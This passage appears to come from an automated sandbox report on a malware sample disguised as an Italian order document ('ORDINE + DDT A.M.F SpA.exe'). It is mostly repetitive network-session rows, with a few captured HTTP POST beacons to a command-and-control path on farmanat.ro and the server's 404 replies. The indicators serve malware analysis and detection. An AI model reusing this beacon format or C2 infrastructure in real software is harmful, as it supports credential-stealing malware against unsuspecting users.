                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              726192.168.11.2050574176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              727192.168.11.2050575176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              728192.168.11.2050576176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              729192.168.11.2050577176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              73192.168.11.2049909176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:47.107852936 CET6410OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:47.196496010 CET6411INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              730192.168.11.2050578176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              731192.168.11.2050579176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              732192.168.11.2050580176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              733192.168.11.2050581176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              734192.168.11.2050582176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              735192.168.11.2050583176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              736192.168.11.2050584176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              737192.168.11.2050585176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              738192.168.11.2050586176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              739192.168.11.2050587176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              74192.168.11.2049911176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:47.685832024 CET6418OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:47.774413109 CET6419INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              740192.168.11.2050588176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              741192.168.11.2050589176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              742192.168.11.2050590176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              743192.168.11.2050591176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              744192.168.11.2050592176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              745192.168.11.2050593176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              746192.168.11.2050594176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              747192.168.11.2050595176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              748192.168.11.2050596176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              749192.168.11.2050597176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              75192.168.11.2049912176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:48.224669933 CET6419OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              750192.168.11.2050598176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              751192.168.11.2050599176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              752192.168.11.2050600176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              753192.168.11.2050601176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              754192.168.11.2050602176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              755192.168.11.2050603176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              756192.168.11.2050604176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              757192.168.11.2050605176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              758192.168.11.2050606176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              759192.168.11.2050607176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              76192.168.11.2049913176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              760192.168.11.2050608176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              761192.168.11.2050609176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              762192.168.11.2050610176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              763192.168.11.2050611176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              764192.168.11.2050612176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              765192.168.11.2050613176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              766192.168.11.2050614176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              767192.168.11.2050615176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              768192.168.11.2050616176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              769192.168.11.2050617176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              77192.168.11.2049914176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              770192.168.11.2050618176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              771192.168.11.2050619176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              772192.168.11.2050620176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              773192.168.11.2050621176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              774192.168.11.2050622176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              775192.168.11.2050623176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              776192.168.11.2050624176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              777192.168.11.2050625176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              778192.168.11.2050626176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              779192.168.11.2050627176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              78192.168.11.2049915176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              780192.168.11.2050628176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              781192.168.11.2050629176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              782192.168.11.2050630176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              783192.168.11.2050631176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              784192.168.11.2050632176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              785192.168.11.2050633176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              786192.168.11.2050634176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              787192.168.11.2050635176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              788192.168.11.2050636176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              789192.168.11.2050637176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              79192.168.11.2049916176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              790192.168.11.2050638176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              791192.168.11.2050639176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              792192.168.11.2050640176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              793192.168.11.2050641176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              794192.168.11.2050642176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              795192.168.11.2050643176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              796192.168.11.2050644176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              797192.168.11.2050645176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              798192.168.11.2050646176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              799192.168.11.2050647176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.11.2049828176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:05.424331903 CET6316OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:05.509834051 CET6317INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              80192.168.11.2049917176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              800192.168.11.2050648176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              801192.168.11.2050649176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              802192.168.11.2050650176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              803192.168.11.2050651176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              804192.168.11.2050652176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              805192.168.11.2050653176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              806192.168.11.2050654176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              807192.168.11.2050655176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              808192.168.11.2050656176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              809192.168.11.2050657176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              81192.168.11.2049918176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              810192.168.11.2050658176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              811192.168.11.2050659176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              812192.168.11.2050660176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              813192.168.11.2050661176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              814192.168.11.2050662176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              815192.168.11.2050663176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              816192.168.11.2050664176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              817192.168.11.2050665176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              818192.168.11.2050666176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              819192.168.11.2050667176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              82192.168.11.2049919176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              820192.168.11.2050668176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              821192.168.11.2050669176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              822192.168.11.2050670176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              823192.168.11.2050671176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              824192.168.11.2050672176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              825192.168.11.2050673176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              826192.168.11.2050674176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              827192.168.11.2050675176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              828192.168.11.2050676176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              829192.168.11.2050677176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              83192.168.11.2049920176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              830192.168.11.2050678176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              831192.168.11.2050679176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              832192.168.11.2050680176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              833192.168.11.2050681176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              834192.168.11.2050682176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              835192.168.11.2050683176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              836192.168.11.2050684176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              837192.168.11.2050685176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              838192.168.11.2050686176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              839192.168.11.2050687176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              84192.168.11.2049921176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              840192.168.11.2050688176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              841192.168.11.2050689176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
